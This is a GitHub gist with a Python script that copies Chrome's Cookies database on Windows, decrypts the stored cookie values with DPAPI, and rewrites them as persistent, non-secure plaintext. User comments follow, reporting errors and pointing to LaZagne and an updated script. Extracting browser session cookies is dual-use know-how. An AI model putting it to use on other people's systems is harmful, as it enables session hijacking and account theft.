Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Decrypt Chrome Cookies File (Python 3) - Windows
#Based off https://gist.github.com/DakuTree/98c8362fb424351b803e & pieces of https://gist.github.com/jordan-wright/5770442
from os import getenv
from shutil import copyfile
import sqlite3
import win32crypt #https://sourceforge.net/projects/pywin32/
# Copy Cookies to current folder
copyfile(getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies", './Cookies')
# Connect to the Database
conn = sqlite3.connect('./Cookies')
cursor = conn.cursor()
# Get the results
cursor.execute('SELECT host_key, name, value, encrypted_value FROM cookies')
for host_key, name, value, encrypted_value in cursor.fetchall():
# Decrypt the encrypted_value
decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0
# Update the cookies with the decrypted value
# This also makes all session cookies persistent
cursor.execute('\
UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, secure = 0\
WHERE host_key = ?\
AND name = ?',
(decrypted_value, host_key, name));
conn.commit()
conn.close()
@christian-ehrisman

This comment has been minimized.

Copy link

@christian-ehrisman christian-ehrisman commented Jun 23, 2018

Thanks, it worked for me with one change: in my chrome cookie db 'secure' is 'is_secure'

@igorabrandao

This comment has been minimized.

Copy link

@igorabrandao igorabrandao commented Apr 9, 2019

There is a version for Mac OS and/or Linux?

@Stefan2142

This comment has been minimized.

Copy link

@Stefan2142 Stefan2142 commented Apr 18, 2019

This is the error Im getting

C:\Users\stefa\Downloads>%python3% cookie_decrypt.py
Traceback (most recent call last):
  File "cookie_decrypt.py", line 18, in <module>
    decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0
pywintypes.error: (-2146893813, 'CryptProtectData', 'Key not valid for use in specified state.')

What can I don? Im running it on windows 10. From what I could debug - it stopped at first row.

@mrAsh4r

This comment has been minimized.

Copy link

@mrAsh4r mrAsh4r commented Aug 16, 2019

Why are you using
getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies"
instead
getenv("LOCALAPPDATA") + "/Google/Chrome/User Data/Default/Cookies" ?

@tanwar1998

This comment has been minimized.

Copy link

@tanwar1998 tanwar1998 commented Dec 12, 2019

It is just copying the cookie file from '/../Local/Google/Chrome/User Data/Default/Cookies' to current folder and not doing any actual decryption

@yugo-harago

This comment has been minimized.

Copy link

@yugo-harago yugo-harago commented Dec 12, 2019

How can I use it?

@GSapiah

This comment has been minimized.

Copy link

@GSapiah GSapiah commented Jul 7, 2020

I'm getting an error when calling the CryptUnprotectData method.

error: (13, 'CryptProtectData', 'The data is invalid.')

I can see that the encrypted values are printing out fine but the process fails at the decryption step.

# Decrypt the encrypted_value
	decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0

Any pointers?

@mrAsh4r

This comment has been minimized.

Copy link

@mrAsh4r mrAsh4r commented Jul 7, 2020

I'm getting an error when calling the CryptUnprotectData method.

error: (13, 'CryptProtectData', 'The data is invalid.')

I can see that the encrypted values are printing out fine but the process fails at the decryption step.

# Decrypt the encrypted_value
	decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0

Any pointers?

It`s because the password encryption system in Chromium has changed

@GSapiah

This comment has been minimized.

Copy link

@GSapiah GSapiah commented Jul 7, 2020

Thanks @mrAsh4r: Is there any alternative library?

@mrAsh4r

This comment has been minimized.

Copy link

@mrAsh4r mrAsh4r commented Jul 7, 2020

@GSapiah, yep. You can check LaZagne (https://github.com/AlessandroZ/LaZagne)

@nootkroot

This comment has been minimized.

Copy link

@nootkroot nootkroot commented Jul 20, 2020

@GSapiah, yep. You can check LaZagne (https://github.com/AlessandroZ/LaZagne)

Isn't that just for passwords or does it work also for cookies? If so, how?

@GramThanos

This comment has been minimized.

Copy link

@GramThanos GramThanos commented Feb 2, 2021

I updated the code to work with new chrome encryption system
https://gist.github.com/GramThanos/ff2c42bb961b68e7cc197d6685e06f10

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment